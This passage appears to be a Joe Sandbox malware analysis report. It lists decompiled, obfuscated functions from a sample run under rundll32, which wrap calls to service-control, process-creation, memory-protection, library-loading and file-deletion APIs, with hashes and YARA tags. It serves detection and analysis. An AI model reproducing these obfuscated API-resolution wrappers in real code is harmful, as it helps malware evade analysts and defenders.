Instruction Fuzzy Hash: 8A114675D01219EBDF01EFE5C80A8EEBBB4FF00358F108598E42162251D3B44B14DF84

Uniqueness

Uniqueness Score: -1.00%

Function 00471638, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DdeInitializeA.USER32(00000044,Function_0003D428,00000000,00000000), ref: 00471686

Strings

Link, xrefs: 00471666

Memory Dump Source

Source File: 0000000E.00000002.2107949566.0000000000434000.00000020.00020000.sdmp, Offset: 00434000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_434000_rundll32.jbxd

Similarity

API ID: Initialize
String ID: Link
API String ID: 2538663250-2526951119
Opcode ID: a3b07439834285cb0bea3d9f2c7391e6f6946c82cd316377597939dad2df5ba5
Instruction ID: cd51597cd89ac758c9faf89e5b6a22c419be88ff644f2b2a477b4cc396a109fe
Opcode Fuzzy Hash: a3b07439834285cb0bea3d9f2c7391e6f6946c82cd316377597939dad2df5ba5
Instruction Fuzzy Hash: EE11C170700700ABC320EF7A9D82B8E77E4EF44748B90983AF804D7661EA39AA41874C

Uniqueness

Uniqueness Score: -1.00%

Function 0042BC7A, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 45%

			E0042BC7A(void* __ecx, long __edx, intOrPtr _a4, long _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t49;
				void* _t58;
				signed int _t60;
				long _t65;

				_push(_a12);
				_t65 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E004156B2(_t49);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v32 = 0x66502c;
				_v20 = 0x768f;
				_v20 = _v20 << 5;
				_v20 = _v20 + 0xfffffbc4;
				_v20 = _v20 ^ 0x000ea418;
				_v16 = 0x500;
				_v16 = _v16 >> 9;
				_v16 = _v16 + 0xffffec62;
				_v16 = _v16 ^ 0xffffff63;
				_v12 = 0xceeb;
				_v12 = _v12 ^ 0x4583d5c1;
				_v12 = _v12 ^ 0xf61c5ed0;
				_v12 = _v12 ^ 0xb39f3c56;
				_v8 = 0x5074;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 << 0xc;
				_t60 = 0x23;
				_push(0xf9b1620b);
				_v8 = _v8 / _t60;
				_v8 = _v8 ^ 0x00001ec9;
				_push(0xb236b160);
				E004204D5(0x11e, _v8 % _t60);
				_t58 = RtlAllocateHeap(_a12, _a8, _t65); // executed
				return _t58;
			}

APIs

RtlAllocateHeap.NTDLL(000EA418,FFFFFF63,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042BD43

Strings

,Pf, xrefs: 0042BCA0

Memory Dump Source

Source File: 0000000E.00000002.2107924027.0000000000410000.00000040.00020000.sdmp, Offset: 00410000, based on PE: true

Associated: 0000000E.00000002.2107940232.0000000000431000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.2107944736.0000000000433000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_410000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: ,Pf
API String ID: 1279760036-3497852847
Opcode ID: ad5329f324947bd6ad91a5ee611d71534c280ea3f991268019b2c6de388f8791
Instruction ID: 0586c5fbab207340f3da8a1e84a6ebec273b0178fef15e03497b1970debe451b
Opcode Fuzzy Hash: ad5329f324947bd6ad91a5ee611d71534c280ea3f991268019b2c6de388f8791
Instruction Fuzzy Hash: 212144B2D0020CEBDF14DFE5C84A9DEBBB0FB50318F108188E92566291D3B94B14CF80

Uniqueness

Uniqueness Score: -1.00%

Function 0041DA66, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0041DA66(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t31;
				void* _t39;
				int _t44;

				_push(_a12);
				_t44 = __ecx;
				_push(0);
				E004156B2(_t31);
				_v12 = 0x9824;
				_v12 = _v12 | 0xcb7da71d;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x00658752;
				_v8 = 0xd578;
				_v8 = _v8 << 0xc;
				_v8 = _v8 << 0xe;
				_v8 = _v8 ^ 0xe0002fd4;
				_v20 = 0xfe7d;
				_v20 = _v20 >> 8;
				_v20 = _v20 ^ 0x0000585e;
				_v16 = 0x6de1;
				_v16 = _v16 * 0x4e;
				_v16 = _v16 ^ 0x00213735;
				E004204D5(0x133, __edx, 0x247cad2d, 0x44ef1c65, __ecx, 0, _a4);
				_t39 = OpenSCManagerW(0, 0, _t44); // executed
				return _t39;
			}

APIs

OpenSCManagerW.SECHOST(00000000,00000000,F184FF7E,?,?,?,?,?,?,?,?,?,?,?,00000000,000043DE), ref: 0041DB02

Strings

57!, xrefs: 0041DADF

Memory Dump Source

Source File: 0000000E.00000002.2107924027.0000000000410000.00000040.00020000.sdmp, Offset: 00410000, based on PE: true

Associated: 0000000E.00000002.2107940232.0000000000431000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.2107944736.0000000000433000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_410000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: 57!
API String ID: 1889721586-26168835
Opcode ID: 7502bf563648451cdc6ee3fba127c124e0b279864468f40488bc13250c57ca7a
Instruction ID: 1eeb2da231eb96b39224337088cf0f268220464567f228cd7bfbd224eedbc353
Opcode Fuzzy Hash: 7502bf563648451cdc6ee3fba127c124e0b279864468f40488bc13250c57ca7a
Instruction Fuzzy Hash: 62113671D0020CBBDB04EFA6CC498DEBFB4EB80348F108099E825A3251D7B54B14CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 001F0540, Relevance: 3.3, APIs: 2, Instructions: 252memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 001F058F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 001F07D9

Memory Dump Source

Source File: 0000000E.00000002.2107877116.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d0000_rundll32.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction ID: 7d2b3e2f46484a242d861948dc81d5979dbd3d1417cc4fae46449eb34b2690fd
Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction Fuzzy Hash: EBC19875A002099FCB48CF98C590EAEB7B5BF8C314F248159E949AB356D735EE42CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00471A14, Relevance: 3.1, APIs: 2, Instructions: 56serviceCOMMON

Download Yara Rule

APIs

Part of subcall function 00471AC8: DdeFreeStringHandle.USER32(?,?), ref: 00471AE8

DdeCreateStringHandleA.USER32(?,00000000), ref: 00471A82
DdeNameService.USER32(?,00000000,00000000,00000001), ref: 00471A95

Memory Dump Source

Source File: 0000000E.00000002.2107949566.0000000000434000.00000020.00020000.sdmp, Offset: 00434000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_434000_rundll32.jbxd

Similarity

API ID: HandleString$CreateFreeNameService
String ID:
API String ID: 374373348-0
Opcode ID: b03bf6cde743b102401b81ea2bddc8feb5639e41f23d8f6bc43e6226688da1b4
Instruction ID: 39d027c5ca5e68471d7e18349be7a76208ccc3b7fbc2e24e4635679c6edb1c3e
Opcode Fuzzy Hash: b03bf6cde743b102401b81ea2bddc8feb5639e41f23d8f6bc43e6226688da1b4
Instruction Fuzzy Hash: 8411C270711240AFCB11EFA9C882E8A37ACAF89B04B5041A6FC049B256D678ED40879C

Uniqueness

Uniqueness Score: -1.00%

Function 001F0020, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001F00A4

Strings

VirtualAlloc, xrefs: 001F0089, 001F008C

Memory Dump Source

Source File: 0000000E.00000002.2107877116.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction ID: ab5a0602daf3c2cfb1f7f82f1aace3b254e09e32824a7b508c620ee2c70fd8e3
Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction Fuzzy Hash: AB110060D082CDDAEF02D7E898097FEBFB55B25704F044098E6446A282D7BA575887A6

Uniqueness

Uniqueness Score: -1.00%

Function 0041492A, Relevance: 1.6, APIs: 1, Instructions: 81
fileCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E0041492A(long __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, long _a20, intOrPtr _a24, WCHAR* _a32, long _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48) {
				unsigned int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t61;
				void* _t73;
				signed int _t76;
				signed int _t77;
				long _t84;
				long _t85;

				_push(_a48);
				_t84 = __edx;
				_push(_a44);
				_t85 = __ecx;
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E004156B2(_t61);
				_v32 = 0x27f13a;
				_v28 = 0x4c0b57;
				_v24 = 0;
				_v12 = 0x7aa4;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0xb16472e1;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x01635afc;
				_v20 = 0x7b28;
				_t76 = 0x76;
				_v20 = _v20 / _t76;
				_t77 = 0x7f;
				_push(0xf9b1620b);
				_v20 = _v20 * 0xf;
				_v20 = _v20 ^ 0x000069c5;
				_v8 = 0xb1fe;
				_v8 = _v8 << 6;
				_v8 = _v8 >> 7;
				_v8 = _v8 + 0xffff5bfb;
				_v8 = _v8 ^ 0xffffddd5;
				_v16 = 0xa71b;
				_v16 = _v16 >> 9;
				_push(0x9baba576);
				_v16 = _v16 / _t77;
				_v16 = _v16 ^ 0x00004cca;
				E004204D5(0x16d, _v16 % _t77);
				_t73 = CreateFileW(_a32, _a20, _t84, 0, _t85, _a36, 0); // executed
				return _t73;
			}

APIs

CreateFileW.KERNEL32(00000013,004C0B57,?,00000000,190550B3,00000010,00000000), ref: 00414A22

Memory Dump Source

Source File: 0000000E.00000002.2107924027.0000000000410000.00000040.00020000.sdmp, Offset: 00410000, based on PE: true

Associated: 0000000E.00000002.2107940232.0000000000431000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.2107944736.0000000000433000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_410000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d7eaa5e1d21be338b1cd6ce6653cfaaa8da155c2e378965c531edad88466e545
Instruction ID: 20d33af75fe9acc88c15c0b877115acd64d50a9615d93646a3a2c871de4e18a3
Opcode Fuzzy Hash: d7eaa5e1d21be338b1cd6ce6653cfaaa8da155c2e378965c531edad88466e545
Instruction Fuzzy Hash: 5C313272D0020CBFDF05DF95CC4A8EEBBB5FB48308F508199F91866220D3B59A659B80

Uniqueness

Uniqueness Score: -1.00%

Function 0042F2F9, Relevance: 1.6, APIs: 1, Instructions: 72
processCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E0042F2F9(void* __edx, WCHAR* _a8, WCHAR* _a12, int _a16, struct _STARTUPINFOW* _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, struct _PROCESS_INFORMATION* _a56) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t54;
				int _t64;
				signed int _t65;

				_push(_a56);
				_push(0);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(0);
				E004156B2(_t54);
				_v28 = 0x170c99;
				_v24 = 0;
				_v16 = 0x438d;
				_v16 = _v16 ^ 0x1c0fc040;
				_v16 = _v16 + 0xffffa13b;
				_v16 = _v16 ^ 0x1c0f1065;
				_v8 = 0x7b12;
				_v8 = _v8 + 0xe48b;
				_v8 = _v8 << 2;
				_t65 = 0x70;
				_push(0xf9b1620b);
				_v8 = _v8 * 0x77;
				_v8 = _v8 ^ 0x028dd8b4;
				_v20 = 0x8aa6;
				_v20 = _v20 + 0x376a;
				_v20 = _v20 ^ 0x0000ade9;
				_v12 = 0x19;
				_push(0x90aa198d);
				_v12 = _v12 / _t65;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0x00005708;
				E004204D5(0x2ee, _v12 % _t65);
				_t64 = CreateProcessW(_a8, _a12, 0, 0, _a16, 0, 0, 0, _a20, _a56); // executed
				return _t64;
			}

APIs

CreateProcessW.KERNEL32(1C0F1065,0000ADE9,00000000,00000000,?,00000000,00000000,00000000,00170C99,?), ref: 0042F3E2

Memory Dump Source

Source File: 0000000E.00000002.2107924027.0000000000410000.00000040.00020000.sdmp, Offset: 00410000, based on PE: true

Associated: 0000000E.00000002.2107940232.0000000000431000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.2107944736.0000000000433000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_410000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 026aef61d0656430dbbcca425602156f2ab332a660c9be10ca3ab0af62cf9408
Instruction ID: 4b7acd9744969539c324fb1d71de5eb9216de560a736db9785c18a66555c4cce
Opcode Fuzzy Hash: 026aef61d0656430dbbcca425602156f2ab332a660c9be10ca3ab0af62cf9408
Instruction Fuzzy Hash: B931E072901218FBDF11DEA5C90A8DFBFB5FF08354F108188F91866260D3768A64EF90

Uniqueness

Uniqueness Score: -1.00%

Function 00411D54, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00411E0C

Memory Dump Source

Source File: 0000000E.00000002.2107924027.0000000000410000.00000040.00020000.sdmp, Offset: 00410000, based on PE: true

Associated: 0000000E.00000002.2107940232.0000000000431000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.2107944736.0000000000433000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_410000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 7893705023e0342a7cd03c01fb48380ada36fa37b15ddf495c5e823a11f917f8
Instruction ID: 705a9a52ffc5e3bc771f5aa1c6a64af1b294103223bb1b316082bac8a1cffb4c
Opcode Fuzzy Hash: 7893705023e0342a7cd03c01fb48380ada36fa37b15ddf495c5e823a11f917f8
Instruction Fuzzy Hash: F6213072D01218BBDF01AFE5CC4A8EEBFB4FB05318F108089E914622A0D3799A20DB91

Uniqueness

Uniqueness Score: -1.00%

Function 0042C9E4, Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E0042C9E4(void* __edx, intOrPtr _a4, struct _SHFILEOPSTRUCTW* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ecx;
				void* _t44;
				int _t56;
				signed int _t58;
				signed int _t59;
				void* _t60;

				_push(_a8);
				_push(_a4);
				E004156B2(_t44);
				_v20 = 0x119d;
				_v20 = _v20 + 0x9ae3;
				_v20 = _v20 ^ 0x0000f3ba;
				_v16 = 0x15c9;
				_t58 = 0x44;
				_v16 = _v16 / _t58;
				_v16 = _v16 << 2;
				_v16 = _v16 ^ 0x00002259;
				_v8 = 0x1145;
				_t59 = 0x6f;
				_push(0xbb4be11c);
				_v8 = _v8 * 0x14;
				_v8 = _v8 + 0x4d6;
				_v8 = _v8 | 0x2b983bc8;
				_v8 = _v8 ^ 0x2b990745;
				_v12 = 0xa8da;
				_push(0xbecb068);
				_v12 = _v12 / _t59;
				_v12 = _v12 + 0x20ab;
				_v12 = _v12 ^ 0x00003eb1;
				_t60 = 0x6d;
				E004204D5(_t60, _v12 % _t59);
				_t56 = SHFileOperationW(_a8); // executed
				return _t56;
			}

APIs

SHFileOperationW.SHELL32(00002259), ref: 0042CA9A

Memory Dump Source

Source File: 0000000E.00000002.2107924027.0000000000410000.00000040.00020000.sdmp, Offset: 00410000, based on PE: true

Associated: 0000000E.00000002.2107940232.0000000000431000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.2107944736.0000000000433000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_410000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: e39559b1d037a91dc0661b176709d71676d8dbfe721d595248926b0b633630f9
Instruction ID: 93df560af84c3fc52ab6437942b913d6591801bb2af22b8c72366a7c178d0569
Opcode Fuzzy Hash: e39559b1d037a91dc0661b176709d71676d8dbfe721d595248926b0b633630f9
Instruction Fuzzy Hash: B4112971E00308FBEF48DFE5D94A8DDBBB1EB40314F10C199E524AA291D7B95B549F80

Uniqueness

Uniqueness Score: -1.00%

Function 00413708, Relevance: 1.6, APIs: 1, Instructions: 50
libraryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00413708(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t49;
				struct HINSTANCE__* _t58;

				_push(_a12);
				_push(_a8);
				E004156B2(_t49);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0x3a6ac4;
				_v32 = 0x1f58c;
				_v20 = 0xda16;
				_v20 = _v20 << 6;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 ^ 0x000007d8;
				_v16 = 0xc632;
				_v16 = _v16 * 0x5e;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 ^ 0x3072f0c0;
				_v16 = _v16 ^ 0x30728ae3;
				_v12 = 0x2b62;
				_v12 = _v12 << 5;
				_v12 = _v12 + 0xeea3;
				_v12 = _v12 | 0x9d0e8eab;
				_v12 = _v12 ^ 0x9d0e92d8;
				_v8 = 0x59be;
				_v8 = _v8 * 0xc;
				_v8 = _v8 << 0xf;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x069d3080;
				E004204D5(0x132, __edx, 0xc9745c6b, 0xf9b1620b, __ecx, __edx, _a4);
				_t58 = LoadLibraryW(_a8); // executed
				return _t58;
			}

APIs

LoadLibraryW.KERNEL32(30728AE3), ref: 004137D3

Memory Dump Source

Source File: 0000000E.00000002.2107924027.0000000000410000.00000040.00020000.sdmp, Offset: 00410000, based on PE: true

Associated: 0000000E.00000002.2107940232.0000000000431000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.2107944736.0000000000433000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_410000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 197e89180ee6ad8ede3567d8a7ffd2df6677f249adb172faf506ffb0aacfaaeb
Instruction ID: 80b6dcd8eb24beee1afb4514f8bd033b975d4a6449803aa4b960f988624f146f
Opcode Fuzzy Hash: 197e89180ee6ad8ede3567d8a7ffd2df6677f249adb172faf506ffb0aacfaaeb
Instruction Fuzzy Hash: ED21EDB5C0120DEBDF04DFE5C94A5EEBBB0FB40308F108199E421A6291C3B98B58DF85

Uniqueness

Uniqueness Score: -1.00%

Function 0042F23C, Relevance: 1.5, APIs: 1, Instructions: 49
serviceCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0042F23C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t40;
				int _t49;
				signed int _t51;
				void* _t56;

				_push(_a12);
				_t56 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E004156B2(_t40);
				_v8 = 0x224;
				_t51 = 0x60;
				_push(0x44ef1c65);
				_v8 = _v8 / _t51;
				_v8 = _v8 + 0x6797;
				_v8 = _v8 + 0xffff05c4;
				_v8 = _v8 ^ 0xffff46f6;
				_v16 = 0x944a;
				_v16 = _v16 + 0xffff0be3;
				_v16 = _v16 | 0xb1186cfb;
				_v16 = _v16 ^ 0xffff8f5a;
				_v12 = 0xd484;
				_v12 = _v12 + 0xffffefed;
				_v12 = _v12 << 6;
				_v12 = _v12 ^ 0x00310178;
				_v20 = 0x4577;
				_v20 = _v20 ^ 0x01418ea5;
				_v20 = _v20 ^ 0x0141ca29;
				_push(0xb49340c);
				E004204D5(0x344, _v8 % _t51);
				_t49 = CloseServiceHandle(_t56); // executed
				return _t49;
			}

APIs

CloseServiceHandle.SECHOST(00000000,?,?,?,?,?,?,?,?,?,?,?,?,000043DE), ref: 0042F2F2

Memory Dump Source

Source File: 0000000E.00000002.2107924027.0000000000410000.00000040.00020000.sdmp, Offset: 00410000, based on PE: true

Associated: 0000000E.00000002.2107940232.0000000000431000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.2107944736.0000000000433000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_410000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 79899113739317072f9456874e3800ea4c3a137c92767be877347b61ad0d3eb2
Instruction ID: 4d68a7b30559ebb7780f414ab137aeda29bfc6b7b9f186c68c40e928700c7b3b
Opcode Fuzzy Hash: 79899113739317072f9456874e3800ea4c3a137c92767be877347b61ad0d3eb2
Instruction Fuzzy Hash: 641146B1D00319FBDB48EFE8D8099DEBBB1EB44328F108199E819662A1D3B55B159F90

Uniqueness

Uniqueness Score: -1.00%

Function 00413CA0, Relevance: 1.5, APIs: 1, Instructions: 42
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00413CA0(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t35;
				int _t44;

				_push(_a12);
				_push(_a8);
				E004156B2(_t35);
				_v8 = 0xeec1;
				_v8 = _v8 ^ 0xfbd2ad32;
				_v8 = _v8 + 0xfffff390;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x91bc56ae;
				_v20 = 0x8655;
				_v20 = _v20 | 0x9ba832dd;
				_v20 = _v20 ^ 0x9ba8a02c;
				_v12 = 0xe2da;
				_v12 = _v12 * 0x55;
				_v12 = _v12 + 0x6f0c;
				_v12 = _v12 ^ 0x004b9e8a;
				_v16 = 0xbc2e;
				_v16 = _v16 * 0x47;
				_v16 = _v16 ^ 0x003455f6;
				E004204D5(0x351, __edx, 0x537fce19, 0xf9b1620b, __ecx, __edx, _a4);
				_t44 = DeleteFileW(_a8); // executed
				return _t44;
			}

APIs

DeleteFileW.KERNELBASE(003455F6), ref: 00413D48

Memory Dump Source

Source File: 0000000E.00000002.2107924027.0000000000410000.00000040.00020000.sdmp, Offset: 00410000, based on PE: true

Associated: 0000000E.00000002.2107940232.0000000000431000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.2107944736.0000000000433000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_410000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 5b1d029eb92624a6585f77e33b86a8f147f71a706021de730d0b46b31a3c72d2
Instruction ID: 50a829a984f6439f157760f031e1f078c86514079a47fd7f9c6ce93efa9fb157
Opcode Fuzzy Hash: 5b1d029eb92624a6585f77e33b86a8f147f71a706021de730d0b46b31a3c72d2
Instruction Fuzzy Hash: 8A11F571D00209EBDF04EFA4D94A89EBBB4FB44314F50C598E925A6261E7759B548F40

Uniqueness

Uniqueness Score: -1.00%

Function 0041CD27, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E0041CD27() {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _t48;

				_v20 = 0x9362;
				_v20 = _v20 << 3;
				_v20 = _v20 + 0x3ac5;
				_v20 = _v20 ^ 0x0004a93d;
				_v16 = 0x2d14;
				_v16 = _v16 | 0xd3f48c41;
				_v16 = _v16 >> 5;
				_v16 = _v16 ^ 0x069fac5e;
				_v12 = 0xc5b1;
				_v12 = _v12 << 7;
				_v12 = _v12 ^ 0x469c37c1;
				_t48 = 0x70;
				_push(0xf9b1620b);
				_v12 = _v12 / _t48;
				_v12 = _v12 ^ 0x00a22cf4;
				_v8 = 0x5bb6;
				_v8 = _v8 >> 4;
				_v8 = _v8 | 0x6c69259f;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0x0000087c;
				_push(0xa43506f8);
				E004204D5(0x16b, _v12 % _t48);
				ExitProcess(0);
			}

APIs

ExitProcess.KERNEL32(00000000), ref: 0041CDCA

Memory Dump Source

Source File: 0000000E.00000002.2107924027.0000000000410000.00000040.00020000.sdmp, Offset: 00410000, based on PE: true

Associated: 0000000E.00000002.2107940232.0000000000431000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.2107944736.0000000000433000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_410000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 2e9f4816a751cc7b3e2e4233dde82b2bf974ba370e125a65ab7361591f6c0db6
Instruction ID: 9d6deadc2f9dac01a6146be8a7ab1eb9b80e7f69ff547992c2085b022c332ad9
Opcode Fuzzy Hash: 2e9f4816a751cc7b3e2e4233dde82b2bf974ba370e125a65ab7361591f6c0db6
Instruction Fuzzy Hash: D6112771E0060CFBEB48DFE8C84A59EBBB0FB00708F108599D526A7294C3B51B48DF81

Uniqueness

Uniqueness Score: -1.00%

Function 00427C1D, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00427C1D(void* __ecx, void* __edx, void* _a4, short* _a8, int _a12, intOrPtr _a16) {
				unsigned int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t32;
				void* _t39;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				E004156B2(_t32);
				_v20 = 0xbc1d;
				_v20 = _v20 ^ 0x0dd364ac;
				_v20 = _v20 ^ 0x0dd3f88e;
				_v16 = 0x3616;
				_v16 = _v16 + 0xabd9;
				_v16 = _v16 ^ 0x0000ae6a;
				_v12 = 0xf8e2;
				_v12 = _v12 >> 4;
				_v12 = _v12 ^ 0x000066c9;
				_v8 = 0x7efa;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x00001ae1;
				E004204D5(0x363, __edx, 0x7b24e105, 0x44ef1c65, __ecx, __edx, _a4);
				_t39 = OpenServiceW(_a4, _a8, _a12); // executed
				return _t39;
			}

APIs

OpenServiceW.SECHOST(000066C9,0000AE6A,0DD3F88E), ref: 00427CB6

Memory Dump Source

Source File: 0000000E.00000002.2107924027.0000000000410000.00000040.00020000.sdmp, Offset: 00410000, based on PE: true

Associated: 0000000E.00000002.2107940232.0000000000431000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.2107944736.0000000000433000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_410000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: e4bd333e93bea3d6457ccf8e61da761f4f4b9f5871f377a9978ba0890d7018f1
Instruction ID: b334dd57a4529a2a9ee610a1bd4132db629164c82bbcd1c454e893262804ed45
Opcode Fuzzy Hash: e4bd333e93bea3d6457ccf8e61da761f4f4b9f5871f377a9978ba0890d7018f1
Instruction Fuzzy Hash: BA112771D0020CFBDF45EFE4C80989EBBB4FB04318F008498F91566251D77A8B249F81

Uniqueness

Uniqueness Score: -1.00%

Function 0041D867, Relevance: 1.3, APIs: 1, Instructions: 44
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E0041D867(WCHAR* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				unsigned int _v12;
